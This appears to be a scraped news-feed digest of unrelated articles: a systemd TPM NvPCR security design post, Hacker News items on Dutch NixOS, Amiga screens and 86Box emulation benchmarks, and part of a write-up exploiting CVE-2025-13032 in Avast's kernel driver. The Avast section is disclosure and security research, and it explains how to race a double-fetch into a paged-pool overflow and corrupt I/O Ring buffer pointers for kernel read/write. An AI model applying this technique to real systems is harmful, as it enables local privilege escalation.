Later at runtime, the write is authorized solely on the written property the NvPCR gained during its initialization in initrd. This is what systemd-pcrextend does when it records an event, and it requires no key and no secret, any component with access to the TPM can append. That is deliberate: extends of real PCRs are unauthenticated, too, because adding history is harmless, only rewriting it must be impossible.

tpm2_startauthsession --session=s.ctx --policy-session
tpm2_policynvwritten --session=s.ctx s
tpm2_policyor --session=s.ctx --policy-list=sha256:init.branch,written.branch
tpm2_nvextend 0x01D10200 --hierarchy=0x01D10200 --auth=session:s.ctx --input=m1.bin
tpm2_flushcontext s.ctx
tpm2_nvread 0x01D10200 --size=32 | xxd -p -c 64
5bbe1770fd46c5edfde5ef444b2d681d87925fcd71b1fe98c4f65749a6f3afb6

Notice that we still need to present both branches to the session, including the init.branch digest. For that reason systemd persists it to /run/systemd/nvpcr/<name>.auth after initialization.

Like for regular PCRs, systemd records each NvPCR measurement in its userspace measurement log ( /run/log/systemd/tpm2-measure.log ), so that a verifier can later replay the events and interpret the NvPCR value.

This concludes the hands-on part. When you are done experimenting, shut the software TPM down:

Security considerations of the NvPCR design

Let’s take a look at the security this construction is providing us with. The attacker we are looking at gains access during runtime of the system, after the leave-initrd event is measured, and wants to rewrite the NvPCR history unnoticed, like Alice hiding her login in that naive index attack from the beginning. They have root privilege and can access the TPM to read, write, undefine and redefine NV indexes, extend (but not reset) PCRs. They can also reboot or boot a different OS. Attacks against the TPM hardware itself are out of scope.

The TPM itself is trusted, and so is the measured boot chain up to and including the initrd, including firmware, bootloader and UKI. The initrd is authorized to initialize NvPCRs by design, which is expressed by the signed policy over the initrd state of PCR 11. But PCR 11 is under OS control, a different kernel could extend the expected values and reach the authorized state, too. It takes the firmware-controlled PCRs, which record the bootloader and UKI that actually ran, to tie the initrd state of PCR 11 to the initrd we trust. Booting anything else is visible to the verifier. We also have to trust the key holder, as whoever controls the PCR signing key can bless arbitrary states, and the verifier, which has to check more than just the NvPCR values, as we will see below.

The write policy and the public key are no secrets, so the attacker can undefine our NvPCR and redefine it, byte-for-byte identical. To replay a history, the attacker then has to perform the first write to the fresh index, and both branches of the write policy refuse: The PolicyNvWritten(true) branch can’t authorize the write. Nothing stops the attacker from running the policy commands, and the session digest will even match the write policy, but the deferred written-check fails against the never-written index, and the TPM rejects the extend. And the PolicyAuthorize branch fails, too: the only signature in existence approves the initrd state of PCR 11, which the machine left when leave-initrd was measured. The session can’t reach the signed digest anymore, so the TPM rejects and the attacker isn’t able to create a forged history.

There is one more signature the attacker might try: the same key also signs the UKI’s other PCR policies, for example the ones used for disk unlock, and some of those are satisfiable in the runtime state of the machine. This is where the policyRef comes in: our authorize branch only accepts signatures made for the ref initrd , and the other policies are signed with a different ref (or none at all). The signatures are not interchangeable.

Of course, the attacker doesn’t have to reuse our write policy. They can redefine the index with authwrite , like our naive index from the beginning, and replay whatever history they like. But remember that the name of an NV index is a hash over all of its public properties: the attributes and the write policy, which in turn commits to the vendor’s public key. There is no way to create an index that is writable outside the initrd without ending up with a different name.

This makes the name the anchor of the whole design, and the last missing piece is making it verifiable. After initializing an NvPCR, systemd extends the event nvpcr-init:<name>:0x<handle>:<tpm-name> into PCR 9, a real, non-resettable PCR. It is the cheapest PCR to sacrifice: the kernel measures into it every initrd it is handed, which on a UKI boot is a concatenation of the UKI’s embedded initrd with cpio archives that systemd-stub generates on the fly, for example for credentials, all mangled into a single value, on some setups joined by verbose bootloader records. This makes PCR 9 hard to predict, so no unlock policy can bind to it anyway, while the measurement that matters, the UKI initrd, is already cleanly covered by PCR 11. Once all NvPCRs are initialized, systemd-pcrnvdone.service measures a separator event nvpcr-separator into PCR 9, still inside the initrd. The NvPCR values themselves are attested with TPM2_NV_Certify , which has the TPM sign the current index contents together with the index name. The new systemd-report-sign-tpm2 signer emits these attestations alongside regular PCR quotes. A verifier doing remote attestation must only trust NvPCR values whose attested index name matches an nvpcr-init event that appears before the separator in the PCR 9 event log. Any recreated index fails this check: wrong name, or right name but logged after the separator.

Two capabilities of our attacker are left: rebooting and booting a different OS. A reboot resets the NvPCRs just like the real PCRs, and the next boot re-initializes them in the initrd. The attacker gains nothing: the new boot is a genuine one, its history starts fresh by design, and the verifier can see that a reboot happened. Booting a different OS doesn’t help either, as it produces different measurements in PCR 11 and the other boot chain PCRs. The signed policy can’t be satisfied, and any quote produced from such a boot exposes the manipulated boot chain.

Conclusion

An NvPCR in systemd v262 is an NV extend index whose first write is gated by a signed PCR policy that can only be satisfied in the initrd, while all later writes are free. The index name, measured into PCR 9 during early boot, anchors the construction for verifiers: any index recreated with a weaker write policy carries a different name and is detected. We reconstructed such an NvPCR on the command line and discussed why an attacker can’t forge measurements: once the initrd window has closed, no road into the write policy of a fresh index remains, and everything the attacker can still do is destructive and shows up in attestation.

A practical note to close with: The write policy is based on the UKI’s PCR signing key. When that key rotates, systemd-tpm2-setup detects the name mismatch, checks that the existing index looks like an NvPCR, and recreates it with the new policy. The same path automatically upgrades NvPCRs created by the pre-v262 design, so the roll-out to your systems will happen automatically with the systemd update.

The initrd-bound signed policy turns out to be useful beyond NvPCRs, too. With systemd-cryptenroll --tpm2-public-key-policyref=initrd , you can enroll LUKS keyslots that can only be unlocked from the initrd. And if you want to see all of this on a real system, boot a v262 image with a UKI built with --sign-initrd-pcrs and take a look at systemd-analyze nvpcrs and the PCR 9 event log.


Thanks

To my colleague at Amutable Chris Coulson , who authored the new NvPCR design and gave insightful corrections and additions to this blog post. Linux security work in the upstream projects we all rely on is at the heart of our mission at Amutable: building new secure foundations .

References

Dutch governments builds alternative for Microsoft based on NixOS

Hacker News
www.dawo.community
2026-09-25 04:06:49
Comments...
Original Article

What DAWO stands for

DAWO brings public values and technology together. The community pursues five primary goals.

Digital autonomy

Strengthening the digital autonomy of the Netherlands.

Collaboration

Improving collaboration and knowledge sharing between governments and society.

Security

Safeguarding security and data protection.

Innovation

Encouraging innovation and more efficient ways of working.

Verifiability

Making government IT systems easier to inspect and verify.

Amiga Screens: A Primer

Hacker News
www.datagubbe.se
2026-09-25 03:31:12
Comments...
Original Article

Amiga Screens: A Primer

Autumn 2026

One of the unwritten rules of the Internet seems to be that whenever something Amiga-related is mentioned, at least one Amiga fan (myself included) must show up and try to explain the concept of screens . Amiga screens can have different resolutions, we'll tell you, and one can drag them, we'll say, and other Amiga users rally in agreement, while non-Amiga users probably still don't get what's so great about screens. Until now, when this text has been written, in the hope of converting unsuspecting normies into full-blown Amiga screen lovers.

For practical purposes, this text will focus on the original Amiga graphics hardware, called OCS (Original ChipSet). Some hardware limitations were removed in the subsequent ECS (Enhanced ChipSet) and AGA (Advanced Graphics Architecture) upgrades, but the same basic principles and user experience still apply.


A typical Amiga screen, showing a Workbench desktop with a shell window open.

A Screen is a Screen is a Screen

The specific meaning of screen on the Amiga comes from the operating system, which uses this term to refer to a particular type of display area because it is, well, a screen. Amiga games and demo programmers aren't as bothered by this concept; the Amiga Hardware Reference Manual, for example, refers to a display area as a "playfield", and a demo coder might talk about raster splits , but for simplicity, let's stick to screen .

Hence, a screen on the Amiga is, basically, an area onto which graphics is drawn. Amiga screens can have different resolutions and colour depths, and a program can open any number of different-resolution screens to display graphics.

Today, we mostly use a single, fixed-resolution display area, which is a combined effect of how modern operating systems and flatscreen monitors work. In the heydays of CRT monitors, however, opening different-resolution displays was commonplace. An image viewer running on a VGA-capable MS-DOS machine, for example, might use a 16-colour, 720x400 pixel text mode resolution for browsing files, and then open a new 256-colour 320x200 display when viewing an image.

These variations in resolution and colour depth existed on basically all home computers, and were hardware-enforced tradeoffs to achieve reasonable speed and memory consumption for different use cases. Memory was very expensive at the time (Oh, how history repeats itself!) and the Amiga, which in its stock hardware configuration relied on a relatively small amount of RAM being shared between the CPU, video and audio hardware, offered a high level of control over these screen resolutions and colour depths.

Indices and Planes

The Amiga typically uses indexed palettes , meaning that a limited number of per-screen colour registers contain a user-defined colour value. These values are selected from a 12-bit colour space (or 24-bit, on AGA). For example, colour index 0 might be set to $000, which is black, and index 1 to $F00, which is red.

To manipulate the colour value of individual pixels, planar graphics is used, which means that the colour depth of a screen is increased by adding more bitplanes (bpl for short). Each bitplane is stored separately in memory, and in order to change the colour index of a pixel, a bit must be toggled in each plane.

Thus, a one-bitplane screen gives two colour indices, two bitplanes gives four and so on, up to five bitplanes and 32 colours on the original Amiga hardware (or 8 bpl and 256 colours on AGA).


An illustration of how bitplanes are combined together to represent per-pixel colour indices. (From the Amiga Hardware Reference Manual)

On OCS and ECS, the maximum number of bitplanes per screen is determined by its display resolution, and these are designed to make sense on a PAL or NTSC television set. An OCS Amiga offers low-res and high-res. On PAL, low-res is 320x256 pixels (320x512 with interlace) in up to 32 colours (5 bpl). High-res is 640x256 (640x512 with interlace) in up to 16 colours (4 bpl). These base resolutions can be increased slightly by using overscan , which in high-res can be up to 724x283, but isn't guaranteed to be fully visible on all monitor types or television sets.

In low-res, a sixth bitplane can be used for HAM (Hold-And-Modify), allowing free use of all of the OCS Amiga's 4096 colours simultaneously (with some caveats), or EHB (Extra Half-Brite) which duplicates a 32 colour palette into 32 additional copies of the original colours, but with half the original brightness value.


Deluxe Paint editing an EHB image. Note the colour selector in the bottom right of the screen: The two rightmost columns are "half-brite" copies of the colours in the first two columns. The half-brightness isn't always perfect, since it's limited by the 12-bit colour space.

Unlike most of its contemporary competitors, the Amiga has true, preemptive multitasking, for which planar graphics offers convenient resource frugality. A text editor might work just fine on a 2-colour screen, saving memory that can be used for simultaneously running a graphics program on a 32-colour screen. It's also memory-saving in the sense that only the exactly required number of bits are needed to store a single pixel while keeping memory addressing sane, instead of, say, allocating one byte per pixel and wasting the unused bits. In addition, a screen can be arbitrarily dimensioned and positioned, such as displaying a 320x50 pixel low-res screen at the bottom of the physical display area. Not using more pixels than necessary per screen will also help save memory.

Hardware Hijinx

The Amiga was originally designed as a games machine, which means it's got lots of hardware features for working with graphics. Repositioning a screen is instant, and scrolling an entire screen is extremely fast, to the point that even the operating system allows the user to configure a desktop screen that's larger than the visible area, and scroll around it using the mouse.

It's also easy to change the display resolution and colour depth at arbitrary points in the redraw cycle. This means that several screens can be combined at once, even overlapping, while maintaining a uniform display experience for the end user. Consider the following example:


Simultaneous display of two screens with different resolutions and colour depths.

The above example has been created using the BASIC dialect AMOS, which has its own take on the screen concept and provides simple abstractions for working with the Amiga's graphics hardware. Any type of graphics operation can still be performed individually on any of the screens, such as drawing, scrolling, repositioning the screen and changing the palette.

This fast resolution and colour depth switching is controlled by the Amiga's copper (short for co-processor). The copper works in lockstep with the video rendering hardware and is also used for manipulating colour values and hardware sprites. Among other things, this can create the distinct Amiga feature called "copper gradients" or "copper bars", in which the colour value for a given colour register is changed once per horizontal line, producing striking gradients and more on-screen colours than what can be achieved using the 32 available palette indices.


This is an ordinary 4-colour Workbench screen. The background gradient is created using the copper, by changing the value of colour index 0 at regular intervals during video rendering.

Combining screens with different resolutions and colour depths has a multitude of use cases. Even if the maximum number of colours per screen is 32, these 32 colours can be different on each screen. Thus, a game might display 64 or more colours simultaneously by using 32 colours for the main game area and 32 different colours for the user interface and/or status display. This can then be combined with copper gradients to further boost the colour count.

End User Experience

Apart from games, this swift graphics handling is also convenient when running multitasking productivity software, which (at last!) brings us to screen dragging .

Because of the low display resolutions offered by home computers and early PCs, most applications ran in full-screen mode, taking over the entire display area to show as much information (and user interface) as possible. When multitasking on the Amiga, the user can quickly switch between entire screens using either a button in the top right of the screen, or a system-wide keyboard shortcut. However, screens can also be dragged by clicking and, well, dragging the screen title bar downwards using the mouse. This will reveal another running program's screen behind it, as illustrated below.


An illustration of how screen dragging might look on a user's monitor.

I must confess that even though many of us Amiga fans go on about it, the actual usefulness of screen dragging is limited, at least in my personal workflows. However, the effect must have been rather stunning in 1985, when multitasking and colour graphics were rarely seen in combination other than on very expensive Unix workstations. One use case suggestion is that you can drag down your chat program screen just a bit to check on a file download progressing on the web browser screen behind it, but full-screen switching on the Amiga is so effortless that dragging usually feels a bit cumbersome.

In order to show just how snappy this screen handling is, I've prepared a short movie clip. It's filmed off a flatscreen monitor connected to an Amiga 600, which is a 7 MHz (that's 0.007 GHz) machine based around essentially the same hardware as the original Amiga 1000 in 1985. Here it's playing some music while also running a text editor and the graphics program Deluxe Paint, and of course performing screen switching and dragging:


Click above to watch the movie.

Dual Playfields

The Amiga is also capable of something called dual playfields , which means that for two overlapping screens, colour index 0 on the frontmost screen becomes transparent and will display the contents of the screen below it. The other colour indices remain intact, and all the usual stuff can still be performed individually on each screen: scrolling, painting graphics, palette changes and so on.


An illustration of Dual Playfields from the Amiga Hardware Reference Manual.

The screenshot below shows dual playfields in combination with sprites. The burgundy background and pink stars are painted on the background playfield, which is a 4-colour screen. The green and purple bars are sprites, with the sprite drawing priority set to position them between the two playfields. Everything else is drawn on the foreground playfield, which is an 8-colour screen. The Amiga hardware ensures that each layer can be smoothly animated even on a 7 MHz machine.


Curious readers can download or watch this little Amiga intro through Demozoo .

Full Screen Flow

On modern machines, I typically prefer to run programs as individual, stacking windows. Partly because there's enough screen real estate to go around these days, and partly because many modern programs are designed for this type of behavior. I do like to run some applications maximized to cover the entire screen, such as Visual Studio Code. Thanks to virtual desktops in my window manager, I can then swiftly switch to another working area, just as instantly as I do on my Amiga.

Some programs, however, look silly when maximized on a high-resolution widescreen display. I prefer reading man pages in an 80-column terminal window, and I find that orthodox file managers feel much more reasonable in squarish aspect ratios such as 5:4. The upside of running many windowed applications on the same screen is that they can all be visible at the same time, allowing for fast context switching. The downside is that certain mouse workflows are only really applicable to full-screen applications.

Take Directory Opus , for example. It's one of the best orthodox file managers I know of, and when running in full screen on my Amiga, I can do nifty things like slamming my mouse pointer to either edge of the screen and single-click, which will bring me to the parent of whatever directory is currently displayed in the corresponding lister.


Clicking the edge of a Directory Opus file lister.

The exact same feature can of course be implemented in a more window-focused environment, but it would be pointless: Without the edge of the screen creating a boundary for the mouse pointer, the thin clickable area would be annoyingly hard to target.

A simpler pleasure, but one that's hard to replicate properly on a modern widescreen monitor, is that of editing code - or running just about any terminal-based application - in an 80x24 character full screen text mode. There's something about those proportions that just feels right .

So Much More

This text only scrapes the surface of screens and the Amiga graphics hardware. Planar graphics, for example, allows for a lot of interesting trickery and effects by manipulating only some of the bitplanes making up a pixel's colour value. And we haven't even mentioned the Amiga's blitter hardware yet, which allows for blazingly fast graphics memory copying with various modes for combining or masking out bitplanes - exceptionally useful for high-octane arcade action.

Sprites have been mentioned only briefly, without discussing how they can be used to add extra colour to low-bitplane screens or be multiplexed together to add more sprite colours. If you'd like to know more about that, I recommend Codetapper's Amiga Site which examines the graphics aspect of Amiga games programming in great detail. I highly recommend the article on Shadow of the Beast , which uses the Amiga's graphics hardware very creatively, resulting in a visually stunning game with several layers of smooth parallax scrolling.

Summary

Amiga screens have many interesting properties:

  • Screens use planar graphics, which saves memory and allows for gradual increments of available on-screen colours from two to 32.
  • Screens can be arbitrarily dimensioned and positioned.
  • Several screens with different resolutions (pixel sizes), colour depths and palettes can be displayed simultaneously, and overlap arbitrarily to reveal the screen(s) behind them.
  • Switching between two different screens is instant.
  • Screens can be gradually dragged to reveal another screen behind them.
  • Dual Playfield uses an "alpha-channel" to combine the graphics of two different screens.

Amiga software, including the operating system, makes good use of these features. This allows for productive multitasking workflows despite the machine's limited hardware resources and relatively low display resolution.

Now, since I've mentioned the Amiga online, I just have to wait for some Amiga fan to send me a mail trying to explain what's so great about screens. In the meantime, take care and happy hacking!

Pentium II at 600Mhz with Voodoo 3 Emulated on 86Box with M6 Mac Mini

Hacker News
nyaa.sh
2026-09-25 03:27:45
Comments...
Original Article

Why 86Box Cares About One Core

86Box emulates an old PC at the hardware level. CPU timing, chipset behaviour, ISA and PCI buses, graphics chipsets, sound devices, and disk controllers all matter to getting period software to behave properly. That does not guarantee identical performance to the original hardware, as the Cinebench results below illustrate. Frankly the project is fascinating and the effort has me in awe, but that accuracy is expensive, and almost all of the cost lands on a single host thread.

The practical consequence is quite straightforward in that core count barely matters here. What really matters is how fast one core can run, and how long it can hold that speed without throttling. Luckily for the Mac Mini here that's exactly where Apple Silicon has been strongest, and where the M6 shines.

A little overclock... the M6 running a 650MHz Pentium II in my custom 86Box 6.0 build, with Cinebench 2000 and Winamp. One or two audio underruns kept 650MHz from passing, so 600MHz remains the stable result.

A little overclock... the M6 running a 650MHz Pentium II in my custom 86Box 6.0 build, with Cinebench 2000 and Winamp. One or two audio underruns kept 650MHz from passing, so 600MHz remains the stable result.

The Machines

Every 86Box test uses the same machine configurations, the same disk images and emulated hardware. The comparison set is:

  • Mac Mini M6 (12-core CPU, 24GB, this review unit)
  • Mac Mini M4 (base 10-core CPU, 16GB)

Testing was using a slightly modified build of 86Box 6.0 , released on May 31, 2026. The team improved CPU emulation performance on ARM hosts and added an ARM64 just-in-time recompiler for Voodoo graphics. That second change is particularly relevant here, since the Windows 98 machine is running an emulated Voodoo 3. Some credit certainly belongs to the software, Apple Silicon has fast cores, but 86Box is also getting better at using them.

I have not measured the uplift from an older 86Box version, given this is a review of the M6 and not 86Box.

Why 100% Is the Only Acceptable Number

86Box reports an effective emulation speed as a percentage of its target speed. 100% means the host is keeping pace with the emulator's timing model, so anything less is a genuine problem. It does not guarantee that a benchmark will score exactly as it would on a physical CPU at the same clock.

Consistency also matters more than the average here. Even brief dips produce audible artefacts because sound hardware is fed in real time and starved buffers are heard as brief dropouts which are irritating. Basically any 86box setup that regularly dips below 100% will not feel right, and having adequate headroom on the system to comfortably emulate the target speed will be a much more stable experience.

The result is that turns each host machine into a ceiling rather than a score, and for any given emulated configuration there is a maximum CPU clock the host can sustain at a flat 100%. Because almost all of that work falls on one thread, single-threaded performance moves this ceiling substantially, which is the whole reason the M6 is interesting for this.

Test Method

To find the ceiling, I made a custom build from the same commit as the 6.0 release (build 9001), extending the frequency tables in 50MHz steps up to 800MHz . The Deschutes frequency table patch is available if you want to try it yourself against that tagged release. It adds 500–800MHz entries with memory and cache timings scaled to retain approximately the same access latencies, and keeps the AT bus at 8.33MHz. The emulation code is otherwise unchanged. Both Macs used this build for the extended tests.

Some might argue a Pentium II at these speeds is not era appropriate. I argue it is just a little overclock!

The emulated machine is otherwise fixed across every run:

  • Slot 1 motherboard with Pentium II (Deschutes), clock varied per run
  • 256MB of memory
  • Voodoo 3 emulated VGA with 16MB of video memory (2 threads)
  • Windows 98 SE

86Box CPU configuration for the emulated Pentium II machine

86Box CPU configuration for the emulated Pentium II machine

The load is deliberately a little awkward, Cinebench 2000 running its CPU test while Winamp 2.76 plays a 16-bit 44,100Hz PCM WAV in the background. The audio is a bit of an achor as it's a real-time consumer of the emulated hardware, so any moment it falls behind is immediately audible.

The pass condition is ultimately subjective but strict. If I hear a dropout, or the reported emulation speed falls below 100% at any point, the run fails.

Results

The base M4 Mac Mini holds 500MHz , with both Macs extremely stable throughout the full Cinebench 2000 and 3DMark 2000 SE runs at that speed. At 550MHz , the M4 starts to hitch. They are slight interruptions in Cinebench, but more noticeable during the 3DMark demo, and enough to fail the run.

The M6 passes 550MHz and 600MHz , which is incredible. At 600MHz it held a flat 100% through both Cinebench 2000 runs and the 3DMark 2000 SE demo, the latter giving it 7–8 minutes of uninterrupted testing . That makes the highest passing clock 20% higher than the M4's in this setup.

The CB2000 scores, for anyone who cares:

Cinebench 2000 by emulated Pentium II clock

Emulated clock Cinebench 2000 M6 M4
300MHz 4.62 CB Pass Pass
350MHz 5.34 CB Pass Pass
400MHz 6.16 CB Pass Pass
450MHz 7.02 CB Pass Pass
500MHz 7.73 CB Pass Pass
550MHz 8.54 CB Pass Fail
600MHz 9.28 CB Pass Fail
650MHz 10.08 CB Fail Fail

One run per clock on the custom 86Box 6.0 build. A pass requires a flat 100% emulation speed with no audible dropouts for the whole run. Hover a result for the detail.

Those scores describe the emulated CPU at each clock. A completed render is not enough to pass, the 10.08 CB result at 650MHz came with one or two audible underruns. In reality, I think I may be being too firm on that run, and background activity could have caused the hitches. But staying true to the methodology, 600MHz is the result and leaves a lick of headroom. The 800MHz option is there to extend the test range but clearly not a speed either Mac can sustain.

There is an interesting wrinkle when comparing these scores with real hardware. An Ars Technica forum thread collecting Cinebench 2000 results includes the following user-reported figures:

Period hardware, user-reported Cinebench 2000 scores

Period hardware Cinebench 2000
Pentium II 300MHz 2.38
Pentium II 450MHz 4.35
Celeron 800MHz 7.52
Celeron 533MHz overclocked to 760MHz (95 x 8) 8.03
Pentium III Coppermine 800MHz 9.25
Athlon Classic 600MHz 7.66

User-reported results from the Ars Technica Cinebench 2000 thread. Different systems, memory and operating systems, so period context rather than a controlled comparison.

Our emulated 450MHz Pentium II scores 7.02 CB , about 61% higher than that physical PII 450MHz result. At 300MHz the gap is larger still, with 4.62 CB against 2.38 CB. Bizarrely, our 600MHz result of 9.28 CB lands almost exactly alongside that 800MHz Coppermine. These are individual forum submissions from different systems, so they provide period context rather than a controlled comparison, but the discrepancy is substantial. It's also worth a mention this benchmark version is very old and long before it became the popular benchmark it is today.

I do not yet know why, it's possible memory bandwidth and cache timing within the emulated machine might have something to do with it. There is some relevant history in 86Box's v3.0 release notes , which explain that P6 emulation was not fully accurate because of the complexity of out-of-order execution and L2 cache behaviour. Deschutes timings were tuned to get reasonably close to real hardware. But yeah, not sure.

The discrepancy is already present at 300MHz and 450MHz, below the entries added by my patch. For this review, 600MHz remains the highest passing setting in this 86Box configuration , with a 20% higher stable clock than the M4. The CB2000 scores are useful for showing how that configuration scales, but I would not use them to claim equivalent performance across software on a real Pentium II or Pentium III.

Even the M4's 500MHz is remarkable alongside the overclocked 9950X3D demonstration I was using for context. I do not have a matched x86 run on this custom build, but the base M4 was already a much more capable retro machine than the original 450MHz limit let me establish.

The video below is from the earlier 450MHz run on the M6, where OBS was also compositing and encoding 720p30 H.264. It documents that run, rather than the new 600MHz result.

3DMark 2000 SE running under 86Box on the Mac Mini M6, emulating a 450MHz Pentium II with a Voodoo 3. Emulation speed holds at 100% while OBS encodes the capture.

What the Host Is Actually Doing

86Box parks the work on two 'super' cores, visible as cpu6 and cpu7 , with the rest of the package largely idle. On the M6 those two cores average about 4,483MHz during the 450MHz Cinebench 2000 run and about 4,710MHz during the 600MHz run, peaking at 4,788MHz . Core activity climbs with the emulated clock too, from roughly 41% on each busy core at 450MHz to 45 to 49% at 600MHz, so there is still real headroom left at the highest passing clock. Whole package usage never passes 26% .

The M4 running the same configuration keeps its busy cores closer to 3.7GHz , and that gap is likely most of the reason it stops at 500MHz.

Where This Leaves the Mini

For this specific use, the cheapest new Mac desktop is an unusually good machine. The base M4 already gives me a stable 500MHz Pentium II, the M6 takes that to 600MHz , with intact audio and a full 3DMark demo at 100%. That is an outstanding result from a small, silent box under €1,600. It is the clearest case I have found so far where the M6's single-core lead translates into something you can actually feel rather than something you read off a chart.

Looking at the benchmark numbers, and anecdotal evidence available online from era appropraite benchmarks, this places my virtual system in Pentium III territory. One day I'll look to try XP emulation in 86box.

Power and Thermals On hold until powermetrics reports M6 CPU package power. Check back.

Gaming Benchmarks Cyberpunk 2077 at native 1080p, where the 12-core GPU takes over.

CVE-2025-13032: Entering and Breaking the Avast Antivirus Sandbox Part 2

Hacker News
www.safateam.com
2026-09-25 03:03:46
Comments...
Original Article

Introduction

This blogpost is the second and final part of our Avast research and will focus on the exploitation of CVE-2025-13032, a double-fetch vulnerability we discovered in Avast’s kernel driver.

This post recaps the bug and walks through how we exploited it on an up-to-date Windows 11 system at the time of the finding.

Feel free to read the first part if you missed it → https://www.safateam.com/intelligence-hub/research/technical-articles/cve-2025-13032-entering-and-breaking-the-avast-antivirus-sandbox-part-1

Note: In the latest version the windows kernel and drivers are using user-mode accessors ( https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/user-mode-accessors ) to verify each kernel access to user-mode memory and ensure at each access that user-buffers are in fact reside in userspace. This mitigation will prevent the use of the exploitation technique that is described in this writeup, see additional details at https://www.youtube.com/watch?v=ry4SNYe2f68

Bug Explanation

The bug we want to exploit is a double fetch issue that leads to a kernel pool overflow.

The snippet of code presented below is supposed to capture a `_UNICODE_STRING` structure supplied by the user, but the `Length` field of the user input is fetched multiple times which results in the double fetch issue.

The first fetch is done to allocate a buffer where the string will be copied and a second fetch is done to perform a memcpy based on the retrieved value resulting in a pool overflow if the user changes it between those actions.

1

if ( !a1 && unicodestring_user )

3

    ProbeForRead(unicodestring_user, 0x10, 1);

4

    ProbeForRead(unicodestring_user->Buffer, unicodestring_user->Length, 1);

6

v17 = sub_140071C6C((__int64)v18, &v14[v23 + 13], unicodestring_user);

8

__int64 __fastcall sub_140071C6C(__int64 a1, _QWORD *a2, _UNICODE_STRING *unicodestring_user)

10

  PoolWithTag = ExAllocatePoolWithTag(PagedPool, unicodestring_user->Length + 16, 0x20786E53u);

13

  Length = unicodestring_user->Length;

14

  *PoolWithTag = unicodestring_user->Length;

15

  PoolWithTag[1] = Length;

16

  *((_QWORD *)PoolWithTag + 1) = PoolWithTag + 8;

17

  Buffer = (char *)unicodestring_user->Buffer;

20

    if ( unicodestring_user->Length )

21

      memmove((_OWORD *)PoolWithTag + 1, Buffer, unicodestring_user->Length);

To exploit the double fetch, a second thread runs in a tight loop, continuously toggling the `Length` field of the shared `_UNICODE_STRING` between a small safe value and a large malicious value (e.g. `0x1000`, larger than the allocated buffer). The main thread calls the vulnerable IOCTL in a loop. When the timing aligns — the kernel reads `Length` as small for the `ExAllocatePoolWithTag` call, then reads it as large for the `memmove` — more bytes are copied than were allocated, producing the pool overflow. The race window is narrow but can be won reliably within a modest number of iterations.

Our goal is to exploit this pool overflow to gain an arbitrary kernel read/write primitive and achieve a local privilege escalation. The bug gives us good exploitation conditions: the overflow targets `PAGED_POOL`, both the allocation size and the overflow size are controlled, and so is the content.

The paged pool is a region of Windows kernel memory used for objects and data that the kernel or drivers need, but that can be paged out to disk. It is used for memory that does not need to be accessed by critical code running with high priority. The allocator groups allocations by size class, meaning same-sized objects tend to land close to each other in memory — the property that makes heap spraying viable.

Since Windows 10 19H1 this is handled by the Segment Heap, which uses two backends: the LFH for small allocations, which picks free slots randomly within a size bucket, and the VS allocator for larger ones, which serves the first available chunk of the right size — each requiring a different spray strategy. We can also note that most Windows objects are stored in the paged pool, which gives us a large number of candidates when choosing what to corrupt. In the next section we explain which object we chose and the reasons behind that choice.

For more information about how windows pools work, you can refer to the `Scoop the Windows 10 pool!` paper from Synacktiv ( https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf ).

I/O Ring Object

The I/O Ring Object is an object that maintains a submission queue of I/O operations to be performed asynchronously.

Concretely, it lets userland batch file I/O requests: `IoRingReadFile` copies data from a file into a pre-registered buffer, and `IoRingWriteFile` copies data from a pre-registered buffer into a file. These registered buffers — tracked in the `RegBuffers` field of the `_IORING_OBJECT` — are validated once at registration time and then reused freely for every subsequent operation, making them a persistent and interesting target to corrupt.

We chose this object as our corruption target for several reasons. While the IORing object itself is located in the `NON_PAGED_POOL`, its `RegBuffers` field is allocated in `PAGED_POOL`, which directly matches the pool where the overflow occurs.

Secondly, the size of the `RegBuffers` allocation is fully user-controlled: registering N buffers produces an array of N pointers, each 8 bytes, giving us precise control over the allocation size and making it ideal for a heap spray.

Thirdly, Corrupting a single pointer in that array is sufficient to gain a full arbitrary read/write primitive — there is no need to corrupt a more complex structure.

Finally, I/O Ring Objects have already been used publicly to achieve this exact goal, which confirms the technique and provides a solid reference point for our approach.

( https://windows-internals.com/one-i-o-ring-to-rule-them-all-a-full-read-write-exploit-primitive-on-windows-11/ )

Multiple APIs are available from userland to use the object, here are some of them:

- CreateIoRing

- CloseIoRing

- BuildIoRingReadFile

- BuildIoRingWriteFile

- BuildIoRingRegisterBuffers

- BuildIoRingRegisterFileHandles

- SubmitIoRing

- ...

The `Build.*` APIs are used to construct entries that need to be submitted through the `SubmitIoRing` API.

The `IoRingRegisterBuffers` allows the user to register an array of buffers for future I/O Ring operations, which can be used as a destination buffer for the `IoRingReadFile` operation or as a source buffer for the `IoRingWriteFile`. This action creates the `RegBuffers` pointer array in the `_IORING_OBJECT` and allocates the individual `_IOP_MC_BUFFER_ENTRY` objects it points to, each holding information about the registered buffer.

Find below the `_IORING_OBJECT` and the `_IOP_MC_BUFFER_ENTRY` structure:

1

struct _IOP_MC_BUFFER_ENTRY

4

  unsigned __int16 Reserved;

7

  _IOP_MC_BUFFER_ENTRY_FLAGS Flags;

8

  _LIST_ENTRY GlobalDataLink;

14

  _KEVENT MdlRundownEvent;

15

  unsigned __int64 *PfnArray;

16

  _IOP_MC_BE_PAGE_NODE PageNodes[1];

22

  _NT_IORING_INFO UserInfo;

24

  _NT_IORING_SUBMISSION_QUEUE *SubmissionQueue;

25

  _MDL *CompletionQueueMdl;

26

  _NT_IORING_COMPLETION_QUEUE *CompletionQueue;

27

  unsigned __int64 ViewSize;

29

  unsigned __int64 CompletionLock;

30

  unsigned __int64 SubmitCount;

31

  unsigned __int64 CompletionCount;

32

  unsigned __int64 CompletionWaitUntil;

33

  _KEVENT CompletionEvent;

34

  unsigned __int8 SignalCompletionEvent;

35

  _KEVENT *CompletionUserEvent;

36

  unsigned int RegBuffersCount;

37

  _IOP_MC_BUFFER_ENTRY **RegBuffers;

38

  unsigned int RegFilesCount;

The diagram below shows this structure in memory: `RegBuffers` is an array of pointers, where each `RegBuffers[i]` points to a `_IOP_MC_BUFFER_ENTRY` structure holding the `Address` field that the kernel uses as the I/O target:

The `IopIoRingDispatchRegisterBuffers` function is responsible for allocating and setting up the `RegBuffers` field of our IORing Object.

When used in a normal way, a read operation using a registered buffer will read the file and copy the retrieved data into the address contained in the corresponding RegBuffers entry `RegBuffers[i].Address` without checking if it's still valid as the check is only done during registration.

